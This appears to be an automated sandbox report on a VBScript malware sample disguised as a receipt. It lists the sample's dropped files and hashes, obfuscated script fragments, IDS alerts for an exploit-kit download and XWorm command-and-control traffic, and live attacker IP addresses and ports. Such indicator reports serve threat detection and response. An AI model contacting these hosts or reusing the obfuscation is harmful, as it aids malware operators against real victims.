                                                                      Preview:............................................................................................,................................,I..............*..................{.........................................q..............................A.........................................(......X....%..............................................................................................d.B..............................[..............................#.................p..............c............................;.............h.......................7...................................1.....I..................................................a....................................................j...................................................................................................a.......................V.................................{-..........................................[....................................n..................................................|.................
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8601
                                                                      Entropy (8bit):1.1545164397538636
                                                                      Encrypted:false
                                                                      SSDEEP:48:zEuB7ok0LmcrzKI9XjvjvGWt/nSz4DP6FIB/IoZt/V:4uBsk0ac1jvqcD6QhV
                                                                      MD5:F4A704DD6599AA965F753CF4AFF41544
                                                                      SHA1:27F6166A11011BF9340B9477D469A5E39B67CF5B
                                                                      SHA-256:689F1C7B21D424488E2F82F5E1CF663D41BE2B8402853953B723F457D91F5C2F
                                                                      SHA-512:F2EC79C777CA0349BA727C2292026C83C3CCB0F84C807431A859DB7196248C95E17DFE13EA081F3020BF12F14001D58824F6EE0AEE770DED6BEB7D94E082C082
                                                                      Malicious:false
                                                                      Preview:...................8..............................$.....................................................>....................'.......................................Y.....................................B........C....X.......................................:.........................................................V.............................................H.....b..............S...........................................................w..........................f..........................................................................................G..............................................P@...................fj........................G..]................................................0......... ..................................................................................................H.......................................................................................................................................................................................
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):225561
                                                                      Entropy (8bit):1.2509602063831964
                                                                      Encrypted:false
                                                                      SSDEEP:768:vodpoBR9G/El4UjO+zHLgOWJmrzfhDM2QY2RSbSL8nMzcUqbFuPYVTmTy2MekyEc:W2pzkDkzfhAtNbKANtv4U
                                                                      MD5:6865DE99FA19A6862DF5C404DE274F27
                                                                      SHA1:4EFBD7E416C513C7B2516052EFD42DB502306C35
                                                                      SHA-256:3921ED66814A1199A488E44FDD72C224D4AD9505F3EA9D111E046704B37483B3
                                                                      SHA-512:F46BDCB2A29BA7ECD780C181230E573D3D0D7C55BFC06CAD641FA764F90068AFB6A3F7FC14AF1BA725A168EF212CBA93F6530FE7C0D0EE0C78B5A5B729F41B3D
                                                                      Malicious:false
                                                                      Preview:......................................................."...............+...........).....................................(.....................................................................W.................................. M...............................a.1................r.......................................................................................:..B.............._......U................./........................7.......................................y......................................S...)........................................................n..........(..........x...e......>..............................:........8..................................q.........................................................z..............Y..i............................................2.........f...............................................................................T........................................................v...........5....................................
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):155008
                                                                      Entropy (8bit):4.592026808124209
                                                                      Encrypted:false
                                                                      SSDEEP:1536:GvWaiD1khghhBlYPnsfL3qy0IPazqk8R4JIZoyvUv8fUc/SzqJH3G69/BKhoS64z:GcD1kEVqy0IPaQ7ZhjNaIH37/f8
                                                                      MD5:8F6AC9BACA244A9FE17E755F881C8FC5
                                                                      SHA1:8C1B08CE1996A597904283F8BE8FE677ABB592D9
                                                                      SHA-256:200AD6E107078B2C0ED3B29AA5CE0F7E4AE26E80A8AA25AEA2BB487B2F20AE66
                                                                      SHA-512:78B5924ECC3CB0648B5511638AF98EB1E00D8A150CA84F574CAC9DE04F7BD50D95E2A33C981F1F0467EB898D6D9C34978264B178F57B016A106CEC8F82643922
                                                                      Malicious:false
                                                                      Preview:................3............................&&&&.g......................,......)............ZZ.........{{......I.................!!.k.?.....&&.00............PPPP.p..........7.......\...........<<<.9..............``..............%.....................OO........m.6.P........e...............7777.......................?....P..............,........c..l.....V.........Y................GGG.....}......mmm......I..................H..hh..7...7.g.........mmmmmmmm...............II...........o..33.........""".......................CC..........LLL......q......G......>>................................X......\\..cc........ss..................O....O.QQQQ.R...EE........P..........b..V.........................J..............:...................OO...........a...........hh...<<<..................ggg..HHH.........**..........ww....UU..ooo.........99..........v......II..d....u...nn................c..www..OO..... ........................................77.l.......................g.d........K...(..............
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):56731
                                                                      Entropy (8bit):1.2442160585209034
                                                                      Encrypted:false
                                                                      SSDEEP:384:6tYghFWWJicOfl9hdYo9Gvdjh1rjjKlsru8a/3FPzYnaIgapZvHcFe/0C2vqW8IP:NyJicyhlodh1jKlP/3FcRseqD
                                                                      MD5:BCA0C962216D9B512E1FEE1F72EBA35B
                                                                      SHA1:FF228246A15FA291474DF13F96C51A6BBE03FDBE
                                                                      SHA-256:9207608EB008266B5F27EFAF786A1B6D2C4B611F484F62B5FF31D764C0225923
                                                                      SHA-512:848BEBCE00D0968884AC1A54BC220DA34FADAA072F403434741DFC3F9843EB3848864184F1F38DAEB013CE0BFEE1BDC09679E80F2EAB9C8CC67ABA3816E0548A
                                                                      Malicious:false
                                                                      Preview:6.~........................................................E...............................x...............................................-...................}..............................O....k..............................................................X..................................).......Y...7.....................W......................................c...................................................................\....................0....................................4............~.........................................................................................Z...............................................W..............................p................I....R.............................9........................%............................................................."\.....................n......8................................C...............................................................b..............u..........................W.................
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):495473
                                                                      Entropy (8bit):1.252683728528738
                                                                      Encrypted:false
                                                                      SSDEEP:1536:29Atz1Dww/YItq3ys1yNe3uRHiOnU2E74SEH:29AtzV/2yFauRHcoH
                                                                      MD5:EF47BA5BA9823E8C3469035CF70773D2
                                                                      SHA1:21D1961813BA8BABF395C3AFE324487EE355578F
                                                                      SHA-256:895776946CC4E8956593C9B8CBA36B3D0523F921C419F2A68C58C82FC5BA8C8B
                                                                      SHA-512:E78EA0CA2E615EF745FDE2A8D1FE07F7216E253057805091E0E91A4E7CD780BA8C5E33F2DFA6283104D7A2EED606DEAAE1E82345135CBA914ECAB32B9C5CCF27
                                                                      Malicious:false
                                                                      Preview:............................................................................................,................................,I..............*..................{.........................................q..............................A.........................................(......X....%..............................................................................................d.B..............................[..............................#.................p..............c............................;.............h.......................7...................................1.....I..................................................a....................................................j...................................................................................................a.......................V.................................{-..........................................[....................................n..................................................|.................
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4194304
                                                                      Entropy (8bit):7.999957575310736
                                                                      Encrypted:true
                                                                      SSDEEP:98304:SDcLaUgZLGTVCfjemnYMjgfRQ14dewsjdis7xGC4tIl:SD4aUgZLhj3gZj67xHRl
                                                                      MD5:498A8D2FF2582C3230061DB8C034E542
                                                                      SHA1:FD90A6C047C4545728E60FEA23DDA445618AB56F
                                                                      SHA-256:4FD8B4E320029B4934A877CD932ABACF6A86AABB78DDDB264E7F752C8949A9AB
                                                                      SHA-512:EF9CBD701C76595A6F9B2C04C79C2430227CA6D23B6A6716892CC28C8A8B2FD40A98AF9A46AF0EF824F886D9916D8046221710F7F6AC8F35B2F8A4DD24A86B56
                                                                      Malicious:false
                                                                      Preview:..9.......F.+...t/.....<o.Qme.x.......N;-.6.....M..\:7.I.d@..C...BDvt.v=.x!of.G....R...p.n..].o....,I.B.h".....E..%_v1.#bD.@.].....D....g..-...Bx.l..I...6.........j..p....x*.z02O.k$.'..di......S...j...=..<...A....=.".,=...N!.x.....1..h.T$>..|a u... .q....Y..bjA.......). $.n@..g.....^...D.7...T..ld.v.../2}y.....L.!.}..KDy...g........E.x..j.\.-.:....:....F...2D./.....C....8....Y..s.R.........i..JV..Pv...|..N......x).`.T...`..)..f...]..c* ...W...7V*.U..&...s...{..'..Bn5^0.z@L.~.u..7^..r.#YS.Z..0..i.F...5.......v..L..s..4.BB.8.-.0..n.p.]eCc.m:.G...th..TT.)..6Y......D. C.=....u.H....c..n...oT.s..J-).w....H.|gd)....D.%.Zn^..e...^.6O........#.9......\.....,g...#.R......l`.s]1..D...z...P.).?.H.t....~...\.A...#..X.y..e]@4!....."K(.?:q..;E.....+.........a......~..U..1.l_...c.=l.!<.i.V.....-iD.K.x......$.8.../.~D..^..l........u....7bA"...'..J....\1....W.T.C..4.5|G:.......Se,..>...HK.^..e..'B.ah....@....\.9u..6..Q{4.-...n..CX.T..,o..{.m.+.w.......
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8601
                                                                      Entropy (8bit):1.1545164397538636
                                                                      Encrypted:false
                                                                      SSDEEP:48:zEuB7ok0LmcrzKI9XjvjvGWt/nSz4DP6FIB/IoZt/V:4uBsk0ac1jvqcD6QhV
                                                                      MD5:F4A704DD6599AA965F753CF4AFF41544
                                                                      SHA1:27F6166A11011BF9340B9477D469A5E39B67CF5B
                                                                      SHA-256:689F1C7B21D424488E2F82F5E1CF663D41BE2B8402853953B723F457D91F5C2F
                                                                      SHA-512:F2EC79C777CA0349BA727C2292026C83C3CCB0F84C807431A859DB7196248C95E17DFE13EA081F3020BF12F14001D58824F6EE0AEE770DED6BEB7D94E082C082
                                                                      Malicious:false
                                                                      Preview:...................8..............................$.....................................................>....................'.......................................Y.....................................B........C....X.......................................:.........................................................V.............................................H.....b..............S...........................................................w..........................f..........................................................................................G..............................................P@...................fj........................G..]................................................0......... ..................................................................................................H.......................................................................................................................................................................................
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):401789
                                                                      Entropy (8bit):7.065739037088379
                                                                      Encrypted:false
                                                                      SSDEEP:6144:VKZHDLgRwDXlRryEnqgwg7MfFR0bs0A5SmatP+jiCn41/OfGmlYc:Vkx1hyE6gyQbLARxjiC4KGy
                                                                      MD5:DE8A813CE4FD2B0CC978241AB06A18EC
                                                                      SHA1:FF3712B5D4D5AD5C5229AF56800710DE26CA2D1E
                                                                      SHA-256:8DFA258211EEB70EB2DAFE04758756BFBCBECE83013EB853CECA71B22928E91D
                                                                      SHA-512:8F06E206F7F58AA9BDC36425589C2AFAFDF42986E1AD1102E5B38A1717CC2E354A1A8564A9A7FCB2DD74E22E214000AF2184C04C2758DA37EAF89C9567BF63AE
                                                                      Malicious:false
                                                                      Preview:..........lll...............ZZZZ........................eee....................................................K.6...... ........=......i...l......<<..c.................8..........t......T..........q....N.......tt........GGGG..............................}}...%........T..XX....^.......7.pp.hhh..............................D..__..........((.....pp.K...&&&&&&&......k.................................yyyyyyy.........E..a......yy.. ..........................d............................................`.n..........V.....VVV.=..555.U.......222...;;.........._.g..................... .......DDDD.......o.......,..............V........1.3......S.........m......(..................k.....L..ww.9....((..............(..y.......PP..............||||||......(.ZZZ..u......m................r....nn..........O.DDD....ttttt.c...................@....[.......ZZZZZZ.D.}........................................<<<......[[[[......ccc..........*..........RR.......yyyy...J..................xx........VVVV...........
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):225561
                                                                      Entropy (8bit):1.2509602063831964
                                                                      Encrypted:false
                                                                      SSDEEP:768:vodpoBR9G/El4UjO+zHLgOWJmrzfhDM2QY2RSbSL8nMzcUqbFuPYVTmTy2MekyEc:W2pzkDkzfhAtNbKANtv4U
                                                                      MD5:6865DE99FA19A6862DF5C404DE274F27
                                                                      SHA1:4EFBD7E416C513C7B2516052EFD42DB502306C35
                                                                      SHA-256:3921ED66814A1199A488E44FDD72C224D4AD9505F3EA9D111E046704B37483B3
                                                                      SHA-512:F46BDCB2A29BA7ECD780C181230E573D3D0D7C55BFC06CAD641FA764F90068AFB6A3F7FC14AF1BA725A168EF212CBA93F6530FE7C0D0EE0C78B5A5B729F41B3D
                                                                      Malicious:false
                                                                      Preview:......................................................."...............+...........).....................................(.....................................................................W.................................. M...............................a.1................r.......................................................................................:..B.............._......U................./........................7.......................................y......................................S...)........................................................n..........(..........x...e......>..............................:........8..................................q.........................................................z..............Y..i............................................2.........f...............................................................................T........................................................v...........5....................................
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):155008
                                                                      Entropy (8bit):4.592026808124209
                                                                      Encrypted:false
                                                                      SSDEEP:1536:GvWaiD1khghhBlYPnsfL3qy0IPazqk8R4JIZoyvUv8fUc/SzqJH3G69/BKhoS64z:GcD1kEVqy0IPaQ7ZhjNaIH37/f8
                                                                      MD5:8F6AC9BACA244A9FE17E755F881C8FC5
                                                                      SHA1:8C1B08CE1996A597904283F8BE8FE677ABB592D9
                                                                      SHA-256:200AD6E107078B2C0ED3B29AA5CE0F7E4AE26E80A8AA25AEA2BB487B2F20AE66
                                                                      SHA-512:78B5924ECC3CB0648B5511638AF98EB1E00D8A150CA84F574CAC9DE04F7BD50D95E2A33C981F1F0467EB898D6D9C34978264B178F57B016A106CEC8F82643922
                                                                      Malicious:false
                                                                      Preview:................3............................&&&&.g......................,......)............ZZ.........{{......I.................!!.k.?.....&&.00............PPPP.p..........7.......\...........<<<.9..............``..............%.....................OO........m.6.P........e...............7777.......................?....P..............,........c..l.....V.........Y................GGG.....}......mmm......I..................H..hh..7...7.g.........mmmmmmmm...............II...........o..33.........""".......................CC..........LLL......q......G......>>................................X......\\..cc........ss..................O....O.QQQQ.R...EE........P..........b..V.........................J..............:...................OO...........a...........hh...<<<..................ggg..HHH.........**..........ww....UU..ooo.........99..........v......II..d....u...nn................c..www..OO..... ........................................77.l.......................g.d........K...(..............
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):56731
                                                                      Entropy (8bit):1.2442160585209034
                                                                      Encrypted:false
                                                                      SSDEEP:384:6tYghFWWJicOfl9hdYo9Gvdjh1rjjKlsru8a/3FPzYnaIgapZvHcFe/0C2vqW8IP:NyJicyhlodh1jKlP/3FcRseqD
                                                                      MD5:BCA0C962216D9B512E1FEE1F72EBA35B
                                                                      SHA1:FF228246A15FA291474DF13F96C51A6BBE03FDBE
                                                                      SHA-256:9207608EB008266B5F27EFAF786A1B6D2C4B611F484F62B5FF31D764C0225923
                                                                      SHA-512:848BEBCE00D0968884AC1A54BC220DA34FADAA072F403434741DFC3F9843EB3848864184F1F38DAEB013CE0BFEE1BDC09679E80F2EAB9C8CC67ABA3816E0548A
                                                                      Malicious:false
                                                                      Preview:6.~........................................................E...............................x...............................................-...................}..............................O....k..............................................................X..................................).......Y...7.....................W......................................c...................................................................\....................0....................................4............~.........................................................................................Z...............................................W..............................p................I....R.............................9........................%............................................................."\.....................n......8................................C...............................................................b..............u..........................W.................
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):44084
                                                                      Entropy (8bit):1.251987965137089
                                                                      Encrypted:false
                                                                      SSDEEP:384:H5J4r26NPfk3R0omoj53ZOmVFPACwEygLw6:b4igfY3wEy9
                                                                      MD5:8E1ECD1CAD1A69BA46F3589D3EE05FCD
                                                                      SHA1:511FE3218234DFD061C85834E32694D500A2D8CA
                                                                      SHA-256:027B544D8E1F0A9CC480B455943CDB8B7F2E1E6FE64FA4E84C5FB22F58E75534
                                                                      SHA-512:D4E8D21B29799A2FD6AA6B254B0E5F1E212F2CEFF6244D3AE1641F460A88FD39EC32AB04E3787BE6C313ABC85B76A2ECC90FA697C58B9899AEE59B16452D98F7
                                                                      Malicious:false
                                                                      Preview:....................................................................................................................g.....................t...................)...}..............................................................................................................O.f...............................r................................S...U................:........................................2................................................................7........................."....c.........-..........................>.........................j...........h...............................G2......P.......................qd.......................................................................................................................................\........................7.....................O..T;...LK.......j.........................................................Y..........................J...........................................................................
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:Targa image data - Map 32 x 10414 x 1 +1
                                                                      Category:dropped
                                                                      Size (bytes):669932
                                                                      Entropy (8bit):5.5314845590929895
                                                                      Encrypted:false
                                                                      SSDEEP:6144:gKk30jClLCugYQs0Om0TmZi6ZYMdCZcZtaW22ibSd4MoX1DXI5nR9mx2KdQJf6mC:ghdCugMm0TWNIJpbIu945c2iAWeO
                                                                      MD5:43AB379A4F5EB535BEEFA8769D0F145C
                                                                      SHA1:B5BEDA93EDAB6D45FC87C74406F28575AE3BA633
                                                                      SHA-256:E35EFD069097EFCED37EB9A320F9D1519558C61B3C6B606E659A28B0432ADF35
                                                                      SHA-512:27B864E0C981CBC385505AB031A5BF245F8DA6588A7762447305A72E8513F904A4509EB104E6A75EB279D364EF853B936405E3B12C6F63082CB2F33D674826A0
                                                                      Malicious:false
                                                                      Preview:............ ..(............ .(...lI..``.... ......Y..HH.... ..T......@@.... .(B...,..00.... ..%..l... .... ............... ............... .h....0...PNG........IHDR.............\r.f.. .IDATx....5.q..<U..v....-..9..EQ"...$/..."..$N$'.....X.. .#....H.......$....!PdY....,.Cz.....s.....}..J......o....>...z.*.J..J..J..J..J..J..J..J..J..J..J..J>..G..../O..j*..............%...0i....4..S.v.nyW....K...\.;....,^.p.rqV5.....Z..e..R.6.P`4..[2.4..).N.TPT8... ...T.EEr..E.n.}..+.............:...|..m.M.y...E.3}....q...#...L.@..#....h.0...E.F(......F".b......iP..I.R.JF.BP.....~.b..h.9...~......+..-&.{...4,V......g.c.y..^v.......'.*...Y..Q.x.Y.4.........Q.m.....WQ.'. .K9.b..D.S.<X.}^.......s.axY...........,W..[@..>...."&..i..>.'}.T.oOV...U...BZ.QL`$....x.U}..U....m0#w...@3..pD..)...X...Jz.s...K...E./.k..t..._...O.-W...*..s^q..6.._r.).?........0$.eS.*2h.R.i....UkGm.5.F..j..0......Oo.3.A..".Z1.IA,bw.d....F.T....."."........O.}.....w.........;$.w...)..)...9.>.....
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):7164
                                                                      Entropy (8bit):5.424736170205588
                                                                      Encrypted:false
                                                                      SSDEEP:192:tVcb8h0g8jt9vETUdc0OcVgW6Bw2uYcJIt:t7unsYKFcVgDzcJw
                                                                      MD5:118AE093FAA03BDC13A832B55CEFB2DE
                                                                      SHA1:022999FA13CBA8ABCF66C5E866C941547E7AEB33
                                                                      SHA-256:4D2145F9211995A99F9828752EF15F9789ADA25B8CEB1EF135CFE9D2ABD5479F
                                                                      SHA-512:07D35E1E7319DC0271D4CD467A3597A36ED27A00CB115381A01DDDE7C316D311B70345DB04BC84E4D660732A4616967AE407812252CFC9E053BC82BD5A406032
                                                                      Malicious:false
                                                                      Preview:!include "MUI2.nsh"..VIAddVersionKey "ProductName" ""..VIAddVersionKey "Comments" ""..VIAddVersionKey "CompanyName" ""..VIAddVersionKey "LegalTrademarks" ""..VIAddVersionKey "LegalCopyright" ""..VIAddVersionKey "FileDescription" ""..VIAddVersionKey "FileVersion" "1.0.0.0"..VIProductVersion "1.0.0.0"....;@@@@@@@@@@@@@@@@@@ DECLARED VAR @@@@@@@@@@@@@@@@@@..Var Carpooldristighedsemanu83..Var udfrdigedesforkarlesl..Var stemmekvgsjapaneserysep..Var Nonviralanthroxanicvejvse..Var morogennemsnitsalderennor..Var kathinatrvlendesminid..Var uidentificerbarh..Var andelsmejerierskge..Var gloseretblondhvernesc..Var stiftamtmandenc..Var affyretristachyou..Var cementalykkeopfat..Var opereredescroce..Var perturbationalh..Var flyttelsopskringmulslet..Var chromatoscopebewailsb..Var snorkeledbryggerkarreness..Var uidentificerbar..;@@@@@@@@@@@@@@@@@@ DECLARED VAR @@@@@@@@@@@@@@@@@@....;!define MUI_ICON icona.ico....SetCompressor BZIP2....; The name of the installer....Name "Desalinates"....; The f
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):213163
                                                                      Entropy (8bit):1.2509035420987697
                                                                      Encrypted:false
                                                                      SSDEEP:768:E6Ak6TqKI8qNenRhDkU13nK/Owzmzj63GMIrCDVOAqiVyycSsOR2D+uFFO8ukH1m:a/TnkUFupj/vM9PV
                                                                      MD5:98B0761197297AB236BC284E2B596C55
                                                                      SHA1:D84B6FCBC7822AC3617AF2E06807F24B6CB09501
                                                                      SHA-256:1B09158404A448B8B8DA21415D6D3FF844658BF441B5A5FB4C651B2B1F5F5809
                                                                      SHA-512:6AB83D66E4E5874688F7A64C133EF3514CE355936CD66895EFE8249E316E2C87195B82FF4E7780180BA3B58C097196AA58736BA6A9365CC36943C6AC8D78A71D
                                                                      Malicious:false
                                                                      Preview:.....................D............................................................................&................................l..................................................................................................s.q....s...........................Z...........................................................................................................................................................................................................................6..............u................/.............................................................................................................................a...............7.............T.................0........................................L........~........................s..........................P..........................................................................................................................*............O.............s..................f....................J...............H
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):380
                                                                      Entropy (8bit):4.150391372844806
                                                                      Encrypted:false
                                                                      SSDEEP:6:jKYlGRpzKVqXB++DC6XBRuN6kgrRmXLY8bOraYKFSX6WlWfHcSTQX97Mm2CXmVyg:mYsDmVqXBpC6XnDk+wXcj5KFSk+X97xE
                                                                      MD5:DCEB38A26FFEAB28D24D304205DD1CFD
                                                                      SHA1:7C3CD56A0E4A2A768D14EA41D88D163C8A3E66DD
                                                                      SHA-256:68F09ACCAE0DF5988DF3AACFFF32C8025F07A266367AD77E1614814B2A05C98F
                                                                      SHA-512:27469F330E5F57D253084536619CAED2F220CC1AAB74B476C175FAA24467301BA0DD1CC52E9F2F15B5052F0CFC397A4C95B7147C7BD6369ECACD7319FF2BCAE5
                                                                      Malicious:false
                                                                      Preview:bulletinernes rallinae tace frdselstavles.tilgangstiden fiskeriinspektionen balder udfoerselstilladelse jaconet besttelsesmagt.leptochlorite ubestridte slatternes saddel nishiki vognmandsforretningers..citronsafters thermocauteries bractless svejshundenes sindet apostates involve.sparringpartners morkin sheller bananivorous pensionistkortets.blackguard trylleslagenes smrsyrens,
                                                                      Process:C:\ProgramData\filaucioso.bat
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):401789
                                                                      Entropy (8bit):7.065739037088379
                                                                      Encrypted:false
                                                                      SSDEEP:6144:VKZHDLgRwDXlRryEnqgwg7MfFR0bs0A5SmatP+jiCn41/OfGmlYc:Vkx1hyE6gyQbLARxjiC4KGy
                                                                      MD5:DE8A813CE4FD2B0CC978241AB06A18EC
                                                                      SHA1:FF3712B5D4D5AD5C5229AF56800710DE26CA2D1E
                                                                      SHA-256:8DFA258211EEB70EB2DAFE04758756BFBCBECE83013EB853CECA71B22928E91D
                                                                      SHA-512:8F06E206F7F58AA9BDC36425589C2AFAFDF42986E1AD1102E5B38A1717CC2E354A1A8564A9A7FCB2DD74E22E214000AF2184C04C2758DA37EAF89C9567BF63AE
                                                                      Malicious:false
                                                                      Preview:..........lll...............ZZZZ........................eee....................................................K.6...... ........=......i...l......<<..c.................8..........t......T..........q....N.......tt........GGGG..............................}}...%........T..XX....^.......7.pp.hhh..............................D..__..........((.....pp.K...&&&&&&&......k.................................yyyyyyy.........E..a......yy.. ..........................d............................................`.n..........V.....VVV.=..555.U.......222...;;.........._.g..................... .......DDDD.......o.......,..............V........1.3......S.........m......(..................k.....L..ww.9....((..............(..y.......PP..............||||||......(.ZZZ..u......m................r....nn..........O.DDD....ttttt.c...................@....[.......ZZZZZZ.D.}........................................<<<......[[[[......ccc..........*..........RR.......yyyy...J..................xx........VVVV...........
                                                                      File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Entropy (8bit):3.6515749642888307
                                                                      TrID:
                                                                      • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                      • MP3 audio (1001/1) 32.22%
                                                                      • Lumena CEL bitmap (63/63) 2.03%
                                                                      • Corel Photo Paint (41/41) 1.32%
                                                                      File name:c56D7_Receipt.vbs
                                                                      File size:133'440 bytes
                                                                      MD5:878ba89eaad87f86c7ff4e5fee1e1823
                                                                      SHA1:8f9496d5da92c9a0f64ffe5aa0ee0da259a9da1b
                                                                      SHA256:30c4d81a0075e27984f768fa73c43240f5b14724a84a5057c15c99114b4aac15
                                                                      SHA512:2ed93d10566fcd7bc312a321a4551611c08dc1de817cf89c5a46be1d8243b77a075896658dd92d5de9d66d7a5bed92b51d25e0729f06369ba673a12b1a37bc7b
                                                                      SSDEEP:3072:ZxQCCYVaCCq+c0C49NixM8B20HcO4uuxQCCYVaCCq+c0C49NixM8B20HcO4uA:Z2CCYsfq+cp49oa8B208Mu2CCYsfq+cm
                                                                      TLSH:5AD3081135EAB04CF2F32FA357EC65E98FABB5722616512E7444074B4AA2EC0CE51B73
                                                                      File Content Preview:..W.i.n.i.i.h.t.q.u.W.L.x.Q.R.L.b.r.Q.m.L.o.p.c.L.i.h.k.A.m.G.d.K.G.d.W.h.b.c.K.G.r.B.L.i.W.C.B.W.f.U.i.W.i.G.U.q.m.k.U.P.t.A.x.N.k.K.W.N. .=. .".Q.K.I.L.e.P.U.R.e.q.G.a.L.f.B.U.U.A.A.R.L.S.q.T.B.B.K.G.n.K.R.S.K.N.s.c.L.c.A.W.u.r.W.P.i.J.c.d.U.c.h.W.q.N.f
                                                                      Icon Hash:68d69b8f86ab9a86
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-10-15T16:37:16.145747+02002019823ET EXPLOIT_KIT WinHttpRequest Downloading EXE Non-Port 80 (Likely Exploit Kit)1103.53.40.62443192.168.2.449730TCP
                                                                      2024-10-15T16:38:24.736567+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.449755TCP
                                                                      2024-10-15T16:38:24.736567+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.449755TCP
                                                                      2024-10-15T16:38:25.278446+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.44975512.221.146.1389402TCP
                                                                      2024-10-15T16:38:25.524375+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.449755TCP
                                                                      2024-10-15T16:38:37.999786+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.449755TCP
                                                                      2024-10-15T16:38:50.489302+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.449755TCP
                                                                      2024-10-15T16:38:54.938606+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.449755TCP
                                                                      2024-10-15T16:38:54.938606+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.449755TCP
                                                                      2024-10-15T16:38:54.982382+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.449755TCP
                                                                      2024-10-15T16:38:54.982382+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.449755TCP
                                                                      2024-10-15T16:39:02.941989+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.449755TCP
                                                                      2024-10-15T16:39:08.007586+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.449755TCP
                                                                      2024-10-15T16:39:12.958478+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.449755TCP
                                                                      2024-10-15T16:39:24.732378+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes112.221.146.1389402192.168.2.449755TCP
                                                                      2024-10-15T16:39:24.732378+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2112.221.146.1389402192.168.2.449755TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 15, 2024 16:37:14.029360056 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:14.029393911 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:14.029465914 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:14.031090975 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:14.031107903 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:15.181097984 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:15.181178093 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:15.186781883 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:15.186790943 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:15.187210083 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:15.242189884 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:15.263253927 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:15.307394028 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:15.651721001 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:15.651746035 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:15.651758909 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:15.651778936 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:15.651824951 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:15.651839972 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:15.651858091 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:15.695363045 CEST49730443192.168.2.4103.53.40.62
